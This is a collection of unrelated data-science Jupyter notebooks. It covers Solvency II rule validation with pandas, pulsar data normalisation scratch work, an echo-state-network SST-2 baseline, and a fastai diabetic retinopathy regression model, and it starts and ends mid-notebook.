print(sentences[sentence_tags[random_sentence_index]].generate(0))
```
The problem with that approach is that if the author uses a rich grammar (as it is the case of Lovecraft), not many phrases are gramatically repeated,
so we get many unique tagged sentences as it happens here.
```
print("{} sentences are available and there are {} unique sentences (almost all)".format(len(sentences), len([s for s, c in sentence_count.items() if c == 1])))
print("Sentences with more than one occurrence:")
for cs, count in sentence_count.items():
if count > 1:
print("{}: {} times".format(cs, count))
```
|
github_jupyter
|
# Tutorial - Evaluate DNBs additional Rules
This notebook contains a tutorial for the evaluation of DNBs additional Rules for the following Solvency II reports:
- Annual Reporting Solo (ARS); and
- Quarterly Reporting Solo (QRS)
Besides the necessary preparation, the tutorial consists of 6 steps:
1. Read possible datapoints
2. Read data
3. Clean data
4. Read additional rules
5. Evaluate rules
6. Save results
## 0. Preparation
### Import packages
```
import pandas as pd # dataframes
import numpy as np # mathematical functions, arrays and matrices
from os.path import join, isfile # some os dependent functionality
import data_patterns # evaluation of patterns
import regex as re # regular expressions
from pprint import pprint # pretty print
import logging
```
### Variables
```
# ENTRYPOINT: 'ARS' for 'Annual Reporting Solo' or 'QRS' for 'Quarterly Reporting Solo'
# INSTANCE: Name of the report you want to evaluate the additional rules for
ENTRYPOINT = 'ARS'
INSTANCE = 'ars_240_instance' # Test instances: ars_240_instance or qrs_240_instance
# DATAPOINTS_PATH: path to the excel-file containing all possible datapoints (simplified taxonomy)
# RULES_PATH: path to the excel-file with the additional rules
# INSTANCES_DATA_PATH: path to the source data
# RESULTS_PATH: path to the results
DATAPOINTS_PATH = join('..', 'data', 'datapoints')
RULES_PATH = join('..', 'solvency2-rules')
INSTANCES_DATA_PATH = join('..', 'data', 'instances', INSTANCE)
RESULTS_PATH = join('..', 'results')
# We log to rules.log in the data/instances path
logging.basicConfig(filename = join(INSTANCES_DATA_PATH, 'rules.log'),level = logging.INFO,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
```
## 1. Read possible datapoints
In the data/datapoints directory there is a file for both ARS and QRS in which all possible datapoints are listed (simplified taxonomy).
We will use this information to add all unreported datapoints to the imported data.
```
df_datapoints = pd.read_csv(join(DATAPOINTS_PATH, ENTRYPOINT.upper() + '.csv'), sep=";").fillna("") # load file to dataframe
df_datapoints.head()
```
## 2. Read data
We distinguish 2 types of tables:
- With a closed-axis, e.g. the balance sheet: an entity reports only 1 balance sheet per period
- With an open-axis, e.g. the list of assets: an entity reports several 'rows of data' in the relevant table
### General information
First we gather some general information:
- A list of all possible reported tables
- A list of all reported tables
- A list of all tables that have not been reported
```
tables_complete_set = df_datapoints.tabelcode.sort_values().unique().tolist()
tables_reported = [table for table in tables_complete_set if isfile(join(INSTANCES_DATA_PATH, table + '.pickle'))]
tables_not_reported = [table for table in tables_complete_set if table not in tables_reported]
```
### Closed-axis
Besides all separate tables, the 'Tutorial Convert XBRL-instance to CSV, HTML and pickles' also outputs a large dataframe with the data from all closed-axis tables combined.
We use this dataframe for evaluating the patterns on closed-axis tables.
```
df_closed_axis = pd.read_pickle(join(INSTANCES_DATA_PATH, INSTANCE + '.pickle'))
tables_closed_axis = sorted(list(set(x[:13] for x in df_closed_axis.columns)))
df_closed_axis.head()
```
### Open-axis
For open-axis tables we create a dictionary with all data per table.
Later we will evaluate the additional rules on each seperate table in this dictionary.
```
dict_open_axis = {}
tables_open_axis = [table for table in tables_reported if table not in tables_closed_axis]
for table in tables_open_axis:
df = pd.read_pickle(join(INSTANCES_DATA_PATH, table + '.pickle'))
# Identify which columns within the open-axis table make a table row unique (index-columns):
index_columns_open_axis = [col for col in list(df.index.names) if col not in ['entity','period']]
# Duplicate index-columns to data columns:
df.reset_index(level=index_columns_open_axis, inplace=True)
for i in range(len(index_columns_open_axis)):
df['index_col_' + str(i)] = df[index_columns_open_axis[i]].astype(str)
df.set_index(['index_col_' + str(i)], append=True, inplace=True)
dict_open_axis[table] = df
print("Open-axis tables:")
print(list(dict_open_axis.keys()))
```
## 3. Clean data
We have to make 2 modifications on the data:
1. Add unreported datapoints
so rules (partly) pointing to unreported datapoints can still be evaluated
2. Change string values to uppercase
because the additional rules are defined using capital letters for textual comparisons
```
all_datapoints = [x.replace(',,',',') for x in
list(df_datapoints['tabelcode'] + ',' + df_datapoints['rij'] + ',' + df_datapoints['kolom'])]
all_datapoints_closed = [x for x in all_datapoints if x[:13] in tables_closed_axis]
all_datapoints_open = [x for x in all_datapoints if x[:13] in tables_open_axis]
```
### Closed-axis tables
```
# add not reported datapoints to the dataframe with data from closed axis tables:
for col in [column for column in all_datapoints_closed if column not in list(df_closed_axis.columns)]:
df_closed_axis[col] = np.nan
df_closed_axis.fillna(0, inplace = True)
# string values to uppercase
df_closed_axis = df_closed_axis.applymap(lambda s:s.upper() if type(s) == str else s)
```
### Open-axis tables
```
for table in [table for table in dict_open_axis.keys()]:
all_datapoints_table = [x for x in all_datapoints_open if x[:13] == table]
for col in [column for column in all_datapoints_table if column not in list(dict_open_axis[table].columns)]:
dict_open_axis[table][col] = np.nan
dict_open_axis[table].fillna(0, inplace = True)
dict_open_axis[table] = dict_open_axis[table].applymap(lambda s:s.upper() if type(s) == str else s)
```
## 4. Read additional rules
DNBs additional validation rules are published as an Excel file on the DNB statistics website.
We included the Excel file in the project under data/downloaded files.
The rules are already converted to a syntax Python can interpret, using the notebook: 'Convert DNBs Additional Validation Rules to Patterns'.
In the next line of code we read these converted rules (patterns).
```
df_patterns = pd.read_excel(join(RULES_PATH, ENTRYPOINT.lower() + '_patterns_additional_rules.xlsx'), engine='openpyxl').fillna("").set_index('index')
```
## 5. Evaluate rules
### Closed-axis tables
To be able to evaluate the rules for closed-axis tables, we need to filter out:
- patterns for open-axis tables; and
- patterns pointing to tables that are not reported.
```
df_patterns_closed_axis = df_patterns.copy()
df_patterns_closed_axis = df_patterns_closed_axis[df_patterns_closed_axis['pandas ex'].apply(
lambda expr: not any(table in expr for table in tables_not_reported)
and not any(table in expr for table in tables_open_axis))]
df_patterns_closed_axis.head()
```
We now have:
- the data for closed-axis tables in a dataframe;
- the patterns for closed-axis tables in a dataframe.
To evaluate the patterns we need to create a 'PatternMiner' (part of the data_patterns package), and run the analyze function.
```
miner = data_patterns.PatternMiner(df_patterns=df_patterns_closed_axis)
df_results_closed_axis = miner.analyze(df_closed_axis)
df_results_closed_axis.head()
```
### Open-axis tables
First find the patterns defined for open-axis tables
```
df_patterns_open_axis = df_patterns.copy()
df_patterns_open_axis = df_patterns_open_axis[df_patterns_open_axis['pandas ex'].apply(
lambda expr: any(table in expr for table in tables_open_axis))]
```
Patterns involving multiple open-axis tables are not yet supported
```
df_patterns_open_axis = df_patterns_open_axis[df_patterns_open_axis['pandas ex'].apply(
lambda expr: len(set(re.findall('S.\d\d.\d\d.\d\d.\d\d',expr)))) == 1]
df_patterns_open_axis.head()
```
Next we loop through the open-axis tables en evaluate the corresponding patterns on the data
```
output_open_axis = {} # dictionary with input and results per table
for table in tables_open_axis: # loop through open-axis tables
if df_patterns_open_axis['pandas ex'].apply(lambda expr: table in expr).sum() > 0: # check if there are patterns
info = {}
info['data'] = dict_open_axis[table] # select data
info['patterns'] = df_patterns_open_axis[df_patterns_open_axis['pandas ex'].apply(
lambda expr: table in expr)] # select patterns
miner = data_patterns.PatternMiner(df_patterns=info['patterns'])
info['results'] = miner.analyze(info['data']) # evaluate patterns
output_open_axis[table] = info
```
Print results for the first table (if there are rules for tables with an open axis)
```
if len(output_open_axis.keys()) > 0:
display(output_open_axis[list(output_open_axis.keys())[0]]['results'].head())
```
## 6. Save results
### Combine results for closed- and open-axis tables
To output the results in a single file, we want to combine the results for closed-axis and open-axis tables
```
# Function to transform results for open-axis tables, so it can be appended to results for closed-axis tables
# The 'extra' index columns are converted to data columns
def transform_results_open_axis(df):
if df.index.nlevels > 2:
reset_index_levels = list(range(2, df.index.nlevels))
df = df.reset_index(level=reset_index_levels)
rename_columns={}
for x in reset_index_levels:
rename_columns['level_' + str(x)] = 'id_column_' + str(x - 1)
df.rename(columns=rename_columns, inplace=True)
return df
df_results = df_results_closed_axis.copy() # results for closed axis tables
for table in list(output_open_axis.keys()): # for all open axis tables with rules -> append and sort results
df_results = transform_results_open_axis(output_open_axis[table]['results']).append(df_results, sort=False).sort_values(by=['pattern_id']).sort_index()
```
Change column order so the dataframe starts with the identifying columns:
```
list_col_order = []
for i in range(1, len([col for col in list(df_results.columns) if col[:10] == 'id_column_']) + 1):
list_col_order.append('id_column_' + str(i))
list_col_order.extend(col for col in list(df_results.columns) if col not in list_col_order)
df_results = df_results[list_col_order]
df_results.head()
```
### Save results
The dataframe df_results contains all output of the evaluation of the validation rules.
```
# To save all results use df_results
# To save all exceptions use df_results['result_type']==False
# To save all confirmations use df_results['result_type']==True
# Here we save only the exceptions to the validation rules
df_results[df_results['result_type']==False].to_excel(join(RESULTS_PATH, "results.xlsx"))
```
### Example of an error in the report
```
# Get the pandas code from the first pattern and evaluate it
s = df_patterns.loc[4, 'pandas ex'].replace('df', 'df_closed_axis')
print('Pattern:', s)
display(eval(s)[re.findall('S.\d\d.\d\d.\d\d.\d\d,R\d\d\d\d,C\d\d\d\d',s)])
```
|
github_jupyter
|
```
import numpy as np
%matplotlib inline
import matplotlib.pyplot as plt
def normalize(fold_data,icount_data): #creating function for normalizing folded pulse data
norm_data = np.zeros_like(fold_data) #initializing array for normalized data
for i in range(len(fold_data[:,:,:])): #looping over how ever many itterations within the folded data necessary to fill norm_data
norm_data[:,:,:,i] = fold_data[:,:,:,i]/icount_data[:,:,:] #normalizing data
return norm_data
start = "arochime-invpfbB0329+54_32768chan3ntbin"
fold = "foldspec_2018-08-16T10:"
icount = "icount_2018-08-16T10:"
end = ".000+30.000000000000004sec"
#final code will look something like:
#need to add plotting line, need to add second for loop for strings with :00 instead of :30
# i = 0
# for filename in filenames:
# fold = np.load(start+fold+str(i+38)+":"+str(30)+end+".npy")
# count = np.load(start+icount+str(i+38)+":"+str(30)+end+".npy")
# norm = normalize(fold,count)
# #plotting line
# plt.savefig(start+fold+str(i+38)+":"+str(30)+end+".png")
# i = i+1
test = np.load(start+fold+str(38)+":"+str(30)+end+".npy")
#what metadata reads:
#arochime - data from arochime
#invpfb - something specific to arochime???????
#B0329+54 - pulsar name
#32768 - number of entries in the frequency axis
#chan3t - ???????????
#foldspec/icount - folded pulse signals or icount data
#_2018_08-16 - date at which data was taken
#T - time
#10:38:30.00 - 10 O'clock and 38 minutes and 30 seconds
#30.000000000000004sec - data taken over 30 second interval?????????
#.npy - filetype
data1 = np.load("arochime-invpfbB0329+54_32768chan3ntbinfoldspec_2018-08-16T10:38:30.000+30.000000000000004sec.npy")
data2 = np.load("arochime-invpfbB0329+54_32768chan3ntbinicount_2018-08-16T10:38:30.000+30.000000000000004sec.npy")
data3 = np.load("arochime-invpfbB0329+54_32768chan3ntbinfoldspec_2018-08-16T10:39:00.000+30.000000000000004sec.npy")
data4 = np.load("arochime-invpfbB0329+54_32768chan3ntbinicount_2018-08-16T10:39:00.000+30.000000000000004sec.npy")
new_data = normalize(data1,data2)
#print(new_data[0,0,:,0]) #phase x
#print(new_data[0,:,0,0]) #freuecy y
#plt.plot(new_data[0,0,:,0],new_data[0,:,0,0])
ndata = np.zeros_like(data2)
ndata2 = np.zeros_like(data1)
for i in range(len(data1[:,:,:])):
ndata2[:,:,:,i] = data1[:,:,:,i]/data2[:,:,:]
#print(ndata2)
#################### EVERYTHING BELOW IS SCRATCH WORK ############################
len(data1)
print(data1[0,:,0,0])
#print(data1[0,0,:,0])
print(data1[:,0,1,0])
plt.figure(figsize=(16,9))
for i in range(len(data1)):
for j in range(len(data1[0,0,:,0])):
plt.plot(data2[i,:,j],data1[i,:,j,0], 'o')
#plt.xlim(237,240)
plt.savefig('fig1.png')
%time
%time
#test1 = np.zeros_like(data1)
interm = np.zeros_like(data1)
for i in range(len(data1)):
for j in range(len(data1[0,0,:,0])):
test1[i,:,j,0] = test1[i,:,j,0]+data1[i,:,j,0]
#plt.xlim(237,240)
%time
#test1 = np.zeros_like(data1)
test_01 = np.zeros(len(data1[0,:,0,0]))
interm = np.zeros_like(data1)
for i in range(len(data1)):
for j in range(len(data1[0,0,:,0])):
test_01 = test_01+data1[i,:,j,0]
#plt.xlim(237,240)
plt.figure(figsize=(16,9))
for i in range(len(data1)):
plt.plot(data2[i,:,0],test_01, 'o')
plt.savefig('fig2.png')
%time
print(len(test1[0,0,:,0]))
plt.figure(figsize=(16,9))
for i in range(len(data1)):
plt.plot(data2[i,:,j],test1[i,:,j,0], 'o')
plt.savefig('fig2.png')
%time
```
|
github_jupyter
|
# SST-2
# Simple Baselines using ``mean`` and ``last`` pooling
## Librairies
```
# !pip install transformers==4.8.2
# !pip install datasets==1.7.0
# !pip install ax-platform==0.1.20
import os
import sys
sys.path.insert(0, os.path.abspath("../..")) # comment this if library is pip installed
import io
import re
import pickle
from timeit import default_timer as timer
from tqdm.notebook import tqdm
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
from datasets import load_dataset, Dataset, concatenate_datasets
from transformers import AutoTokenizer
from transformers import BertModel
from transformers.data.data_collator import DataCollatorWithPadding
from ax import optimize
from ax.plot.contour import plot_contour
from ax.plot.trace import optimization_trace_single_method
from ax.service.managed_loop import optimize
from ax.utils.notebook.plotting import render, init_notebook_plotting
import esntorch.core.reservoir as res
import esntorch.core.learning_algo as la
import esntorch.core.merging_strategy as ms
import esntorch.core.esn as esn
%config Completer.use_jedi = False
%load_ext autoreload
%autoreload 2
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
device
SEED = 42
```
## Global variables
```
CACHE_DIR = '~/Data/huggignface/' # put your path here
RESULTS_FILE = 'Results/Baselines_v2/sst-2_results_.pkl' # put your path here
```
## Dataset
```
# download dataset
# full train, mini train, and val sets
raw_datasets = load_dataset('glue', 'sst2', cache_dir=CACHE_DIR)
raw_datasets = raw_datasets.rename_column('sentence', 'text')
full_train_dataset = raw_datasets['train']
train_dataset = full_train_dataset.train_test_split(train_size=0.3, shuffle=True)['train']
val_dataset = raw_datasets['validation']
# special test set
test_dataset = load_dataset('gpt3mix/sst2', split='test', cache_dir=CACHE_DIR)
def clean(example):
example['text'] = example['text'].replace('-LRB-', '(').replace('-RRB-', ')').replace(r'\/', r'/')
example['label'] = np.abs(example['label'] - 1) # revert labels of test set
return example
test_dataset = test_dataset.map(clean)
# create dataset_d
dataset_d = {}
dataset_d = {
'full_train': full_train_dataset,
'train': train_dataset,
'val': val_dataset,
'test': test_dataset
}
dataset_d
# tokenize
tokenizer = AutoTokenizer.from_pretrained("bert-base-uncased")
def tokenize_function(examples):
return tokenizer(examples["text"], padding=False, truncation=True, return_length=True)
for k, v in dataset_d.items():
tmp = v.map(tokenize_function, batched=True)
tmp = tmp.rename_column('length', 'lengths')
tmp = tmp.sort("lengths")
tmp = tmp.rename_column('label', 'labels')
tmp.set_format(type='torch', columns=['input_ids', 'attention_mask', 'labels', 'lengths'])
dataset_d[k] = tmp
# dataloaders
dataloader_d = {}
for k, v in dataset_d.items():
dataloader_d[k] = torch.utils.data.DataLoader(v, batch_size=256, collate_fn=DataCollatorWithPadding(tokenizer))
dataset_d
```
## Optimization
```
baseline_params = {
'embedding_weights': 'bert-base-uncased', # TEXT.vocab.vectors,
'distribution' : 'uniform', # uniform, gaussian
'input_dim' : 768, # dim of encoding!
'reservoir_dim' : 0, # not used
'bias_scaling' : 0.0, # not used
'sparsity' : 0.0, # not used
'spectral_radius' : None,
'leaking_rate': 0.5, # not used
'activation_function' : 'tanh',
'input_scaling' : 0.1,
'mean' : 0.0,
'std' : 1.0,
'learning_algo' : None,
'criterion' : None,
'optimizer' : None,
'merging_strategy' : None,
'lexicon' : None,
'bidirectional' : False,
'mode' : 'no_layer', # simple baseline
'device' : device,
'seed' : 4
}
results_d = {}
for pooling_strategy in tqdm(['last', 'mean']):
results_d[pooling_strategy] = {}
for alpha in tqdm([0.1, 1.0, 10.0, 100.0]):
results_d[pooling_strategy][alpha] = []
# model
baseline_params['merging_strategy'] = pooling_strategy
baseline_params['mode'] = 'no_layer'
print(baseline_params)
ESN = esn.EchoStateNetwork(**baseline_params)
ESN.learning_algo = la.RidgeRegression(alpha=alpha)
ESN = ESN.to(device)
# train
t0 = timer()
LOSS = ESN.fit(dataloader_d["full_train"]) # full train set
t1 = timer()
acc = ESN.predict(dataloader_d["test"], verbose=False)[1].item() # full test set
# results
results_d[pooling_strategy][alpha].append([acc, t1 - t0])
# clean objects
del ESN.learning_algo
del ESN.criterion
del ESN.merging_strategy
del ESN
torch.cuda.empty_cache()
results_d
```
## Results
```
# save results
with open(RESULTS_FILE, 'wb') as fh:
pickle.dump(results_d, fh)
# # load results
# with open(os.path.join(RESULTS_PATH, RESULTS_FILE), 'rb') as fh:
# results_d = pickle.load(fh)
# results_d
```
|
github_jupyter
|
- https://www.kaggle.com/tanlikesmath/intro-aptos-diabetic-retinopathy-eda-starter
- https://medium.com/@btahir/a-quick-guide-to-using-regression-with-image-data-in-fastai-117304c0af90
- add diabetic-retinopathy-detection training data (cropped)
# params
```
PRFX = 'CvCropDiabtrn070314'
p_prp = '../output/Prep0703'
p_o = f'../output/{PRFX}'
SEED = 111
dbg = False
if dbg:
dbgsz = 500
BS = 256
SZ = 224
FP16 = True
import multiprocessing
multiprocessing.cpu_count() # 2
from fastai.vision import *
xtra_tfms = []
# xtra_tfms += [rgb_randomize(channel=i, thresh=1e-4) for i in range(3)]
params_tfms = dict(
do_flip=True,
flip_vert=False,
max_rotate=10,
max_warp=0,
max_zoom=1.1,
p_affine=0.5,
max_lighting=0.2,
p_lighting=0.5,
xtra_tfms=xtra_tfms)
resize_method = ResizeMethod.CROP
padding_mode = 'zeros'
USE_TTA = True
```
# setup
```
import fastai
print('fastai.__version__: ', fastai.__version__)
import random
import numpy as np
import torch
import os
def set_torch_seed(seed=SEED):
os.environ['PYTHONHASHSEED'] = str(seed)
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
if torch.cuda.is_available():
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
set_torch_seed()
from fastai import *
from fastai.vision import *
import pandas as pd
import scipy as sp
from sklearn.metrics import cohen_kappa_score
def quadratic_weighted_kappa(y1, y2):
return cohen_kappa_score(y1, y2, weights='quadratic')
```
# preprocess
```
img2grd = []
p = '../input/aptos2019-blindness-detection'
pp = Path(p)
train = pd.read_csv(pp/'train.csv')
test = pd.read_csv(pp/'test.csv')
len_blnd = len(train)
len_blnd_test = len(test)
img2grd_blnd = [(f'{p_prp}/aptos2019-blindness-detection/train_images/{o[0]}.png',o[1]) for o in train.values]
len_blnd, len_blnd_test
img2grd += img2grd_blnd
display(len(img2grd))
display(Counter(o[1] for o in img2grd).most_common())
p = '../input/diabetic-retinopathy-detection'
pp = Path(p)
train=pd.read_csv(pp/'trainLabels.csv')
img2grd_diab_train=[(f'{p_prp}/diabetic-retinopathy-detection/train_images/{o[0]}.jpeg',o[1]) for o in train.values]
img2grd += img2grd_diab_train
display(len(img2grd))
display(Counter(o[1] for o in img2grd).most_common())
if np.all([Path(o[0]).exists() for o in img2grd]): print('All files are here!')
df = pd.DataFrame(img2grd)
df.columns = ['fnm', 'target']
df.shape
set_torch_seed()
idx_blnd_train = np.where(df.fnm.str.contains('aptos2019'))[0]
idx_val = np.random.choice(idx_blnd_train, len_blnd_test, replace=False)
df['is_val']=False
df.loc[idx_val, 'is_val']=True
if dbg:
df=df.head(dbgsz)
```
# dataset
```
tfms = get_transforms(**params_tfms)
def get_data(sz, bs):
src = (ImageList.from_df(df=df,path='./',cols='fnm')
.split_from_df(col='is_val')
.label_from_df(cols='target',
label_cls=FloatList)
)
data= (src.transform(tfms,
size=sz,
resize_method=resize_method,
padding_mode=padding_mode) #Data augmentation
.databunch(bs=bs) #DataBunch
.normalize(imagenet_stats) #Normalize
)
return data
bs = BS
sz = SZ
set_torch_seed()
data = get_data(sz, bs)
data.show_batch(rows=3, figsize=(7,6))
```
# model
```
%%time
# Downloading: "https://download.pytorch.org/models/resnet50-19c8e357.pth" to /tmp/.cache/torch/checkpoints/resnet50-19c8e357.pth
# Making pretrained weights work without needing to find the default filename
if not os.path.exists('/tmp/.cache/torch/checkpoints/'):
os.makedirs('/tmp/.cache/torch/checkpoints/')
!cp '../input/pytorch-vision-pretrained-models/resnet50-19c8e357.pth' '/tmp/.cache/torch/checkpoints/resnet50-19c8e357.pth'
learn = cnn_learner(data,
base_arch = models.resnet50,
path=p_o, ps=0.2)
learn.loss = MSELossFlat
if FP16: learn = learn.to_fp16()
%%time
learn.freeze()
learn.lr_find()
learn.recorder.plot(suggestion=True)
learn.recorder.plot()
set_torch_seed()
learn.fit_one_cycle(4, max_lr = 1e-2)
learn.recorder.plot_losses()
# learn.recorder.plot_metrics()
learn.save('mdl-frozen')
learn.unfreeze()
%%time
learn.lr_find()
learn.recorder.plot(suggestion=True)
set_torch_seed()
learn.fit_one_cycle(6, max_lr=slice(1e-6,1e-3))
!nvidia-smi
learn.recorder.plot_losses()
# learn.recorder.plot_metrics()
learn.save('mdl')
```
# validate and thresholding
```
learn = learn.to_fp32()
learn = learn.load('mdl')
%%time
set_torch_seed()
preds_val_tta, y_val = learn.TTA(ds_type=DatasetType.Valid)
%%time
set_torch_seed()
preds_val, y_val = learn.get_preds(ds_type=DatasetType.Valid)
preds_val = preds_val.numpy().squeeze()
preds_val_tta = preds_val_tta.numpy().squeeze()
y_val= y_val.numpy()
np.save(f'{p_o}/preds_val.npy', preds_val)
np.save(f'{p_o}/preds_val_tta.npy', preds_val_tta)
np.save(f'{p_o}/y_val.npy', y_val)
# https://www.kaggle.com/c/petfinder-adoption-prediction/discussion/88773#latest-515044
# We used OptimizedRounder given by hocop1. https://www.kaggle.com/c/petfinder-adoption-prediction/discussion/76107#480970
# put numerical value to one of bins
def to_bins(x, borders):
for i in range(len(borders)):
if x <= borders[i]:
return i
return len(borders)
class Hocop1OptimizedRounder(object):
def __init__(self):
self.coef_ = 0
def _loss(self, coef, X, y, idx):
X_p = np.array([to_bins(pred, coef) for pred in X])
ll = -quadratic_weighted_kappa(y, X_p)
return ll
def fit(self, X, y):
coef = [1.5, 2.0, 2.5, 3.0]
golden1 = 0.618
golden2 = 1 - golden1
ab_start = [(1, 2), (1.5, 2.5), (2, 3), (2.5, 3.5)]
for it1 in range(10):
for idx in range(4):
# golden section search
a, b = ab_start[idx]
# calc losses
coef[idx] = a
la = self._loss(coef, X, y, idx)
coef[idx] = b
lb = self._loss(coef, X, y, idx)
for it in range(20):
# choose value
if la > lb:
a = b - (b - a) * golden1
coef[idx] = a
la = self._loss(coef, X, y, idx)
else:
b = b - (b - a) * golden2
coef[idx] = b
lb = self._loss(coef, X, y, idx)
self.coef_ = {'x': coef}
def predict(self, X, coef):
X_p = np.array([to_bins(pred, coef) for pred in X])
return X_p
def coefficients(self):
return self.coef_['x']
# https://www.kaggle.com/c/petfinder-adoption-prediction/discussion/76107#480970
class AbhishekOptimizedRounder(object):
def __init__(self):
self.coef_ = 0
def _kappa_loss(self, coef, X, y):
X_p = np.copy(X)
for i, pred in enumerate(X_p):
if pred < coef[0]:
X_p[i] = 0
elif pred >= coef[0] and pred < coef[1]:
X_p[i] = 1
elif pred >= coef[1] and pred < coef[2]:
X_p[i] = 2
elif pred >= coef[2] and pred < coef[3]:
X_p[i] = 3
else:
X_p[i] = 4
ll = quadratic_weighted_kappa(y, X_p)
return -ll
def fit(self, X, y):
loss_partial = partial(self._kappa_loss, X=X, y=y)
initial_coef = [0.5, 1.5, 2.5, 3.5]
self.coef_ = sp.optimize.minimize(loss_partial, initial_coef, method='nelder-mead')
def predict(self, X, coef):
X_p = np.copy(X)
for i, pred in enumerate(X_p):
if pred < coef[0]:
X_p[i] = 0
elif pred >= coef[0] and pred < coef[1]:
X_p[i] = 1
elif pred >= coef[1] and pred < coef[2]:
X_p[i] = 2
elif pred >= coef[2] and pred < coef[3]:
X_p[i] = 3
else:
X_p[i] = 4
return X_p
def coefficients(self):
return self.coef_['x']
def bucket(preds_raw, coef = [0.5, 1.5, 2.5, 3.5]):
preds = np.zeros(preds_raw.shape)
for i, pred in enumerate(preds_raw):
if pred < coef[0]:
preds[i] = 0
elif pred >= coef[0] and pred < coef[1]:
preds[i] = 1
elif pred >= coef[1] and pred < coef[2]:
preds[i] = 2
elif pred >= coef[2] and pred < coef[3]:
preds[i] = 3
else:
preds[i] = 4
return preds
optnm2coefs = {'simple': [0.5, 1.5, 2.5, 3.5]}
%%time
set_torch_seed()
optR = Hocop1OptimizedRounder()
optR.fit(preds_val_tta, y_val)
optnm2coefs['hocop1_tta'] = optR.coefficients()
%%time
set_torch_seed()
optR = Hocop1OptimizedRounder()
optR.fit(preds_val, y_val)
optnm2coefs['hocop1'] = optR.coefficients()
%%time
set_torch_seed()
optR = AbhishekOptimizedRounder()
optR.fit(preds_val_tta, y_val)
optnm2coefs['abhishek_tta'] = optR.coefficients()
%%time
set_torch_seed()
optR = AbhishekOptimizedRounder()
optR.fit(preds_val, y_val)
optnm2coefs['abhishek'] = optR.coefficients()
optnm2coefs
optnm2preds_val_grd = {k: bucket(preds_val, coef) for k,coef in optnm2coefs.items()}
optnm2qwk = {k: quadratic_weighted_kappa(y_val, preds) for k,preds in optnm2preds_val_grd.items()}
optnm2qwk
Counter(y_val).most_common()
preds_val_grd = optnm2preds_val_grd['abhishek'].squeeze()
preds_val_grd.mean()
Counter(preds_val_grd).most_common()
list(zip(preds_val_grd, y_val))[:10]
(preds_val_grd== y_val.squeeze()).mean()
pickle.dump(optnm2qwk, open(f'{p_o}/optnm2qwk.p', 'wb'))
pickle.dump(optnm2preds_val_grd, open(f'{p_o}/optnm2preds_val_grd.p', 'wb'))
pickle.dump(optnm2coefs, open(f'{p_o}/optnm2coefs.p', 'wb'))
```
# testing
This goes to Kernel!!
## params
```
PRFX = 'CvCropDiabtrn070314'
p_o = f'../output/{PRFX}'
SEED = 111
dbg = False
if dbg:
dbgsz = 500
BS = 128
SZ = 224
from fastai.vision import *
xtra_tfms = []
# xtra_tfms += [rgb_randomize(channel=i, thresh=1e-4) for i in range(3)]
params_tfms = dict(
do_flip=True,
flip_vert=False,
max_rotate=10,
max_warp=0,
max_zoom=1.1,
p_affine=0.5,
max_lighting=0.2,
p_lighting=0.5,
xtra_tfms=xtra_tfms)
resize_method = ResizeMethod.CROP
padding_mode = 'zeros'
USE_TTA = True
import fastai
print(fastai.__version__)
```
## setup
```
import fastai
print('fastai.__version__: ', fastai.__version__)
import random
import numpy as np
import torch
import os
def set_torch_seed(seed=SEED):
os.environ['PYTHONHASHSEED'] = str(seed)
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
if torch.cuda.is_available():
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
set_torch_seed()
from fastai import *
from fastai.vision import *
import pandas as pd
```
## preprocess
```
img2grd = []
p = '../input/aptos2019-blindness-detection'
pp = Path(p)
train = pd.read_csv(pp/'train.csv')
test = pd.read_csv(pp/'test.csv')
len_blnd = len(train)
len_blnd_test = len(test)
img2grd_blnd = [(f'{p_prp}/aptos2019-blindness-detection/train_images/{o[0]}.png',o[1]) for o in train.values]
len_blnd, len_blnd_test
img2grd += img2grd_blnd
display(len(img2grd))
display(Counter(o[1] for o in img2grd).most_common())
if np.all([Path(o[0]).exists() for o in img2grd]): print('All files are here!')
df = pd.DataFrame(img2grd)
df.columns = ['fnm', 'target']
df.shape
df.head()
set_torch_seed()
idx_blnd_train = np.where(df.fnm.str.contains('aptos2019-blindness-detection/train_images'))[0]
idx_val = np.random.choice(idx_blnd_train, len_blnd_test, replace=False)
df['is_val']=False
df.loc[idx_val, 'is_val']=True
if dbg:
df=df.head(dbgsz)
```
## dataset
```
tfms = get_transforms(**params_tfms)
def get_data(sz, bs):
src = (ImageList.from_df(df=df,path='./',cols='fnm')
.split_from_df(col='is_val')
.label_from_df(cols='target',
label_cls=FloatList)
)
data= (src.transform(tfms,
size=sz,
resize_method=resize_method,
padding_mode=padding_mode) #Data augmentation
.databunch(bs=bs,num_workers=2) #DataBunch
.normalize(imagenet_stats) #Normalize
)
return data
bs = BS
sz = SZ
set_torch_seed()
data = get_data(sz, bs)
```
## model
```
%%time
# Downloading: "https://download.pytorch.org/models/resnet50-19c8e357.pth" to /tmp/.cache/torch/checkpoints/resnet50-19c8e357.pth
# Making pretrained weights work without needing to find the default filename
if not os.path.exists('/tmp/.cache/torch/checkpoints/'):
os.makedirs('/tmp/.cache/torch/checkpoints/')
!cp '../input/pytorch-vision-pretrained-models/resnet50-19c8e357.pth' '/tmp/.cache/torch/checkpoints/resnet50-19c8e357.pth'
set_torch_seed()
learn = cnn_learner(data,
base_arch = models.resnet50,
path=p_o)
learn.loss = MSELossFlat
learn = learn.load('mdl')
df_test = pd.read_csv('../input/aptos2019-blindness-detection/test.csv')
df_test.head()
learn.data.add_test(
ImageList.from_df(df_test,
f'{p_prp}/aptos2019-blindness-detection/',
folder='test_images',
suffix='.png'))
%%time
# Predictions for test set
set_torch_seed()
preds_tst_tta, _ = learn.TTA(ds_type=DatasetType.Test)
%%time
# Predictions for test set
set_torch_seed()
preds_tst, _ = learn.get_preds(ds_type=DatasetType.Test)
preds_tst = preds_tst.numpy().squeeze()
preds_tst_tta = preds_tst_tta.numpy().squeeze()
np.save(f'{p_o}/preds_tst.npy', preds_tst)
np.save(f'{p_o}/preds_tst_tta.npy', preds_tst_tta)
preds_tst2use = preds_tst_tta
def bucket(preds_raw, coef = [0.5, 1.5, 2.5, 3.5]):
preds = np.zeros(preds_raw.shape)
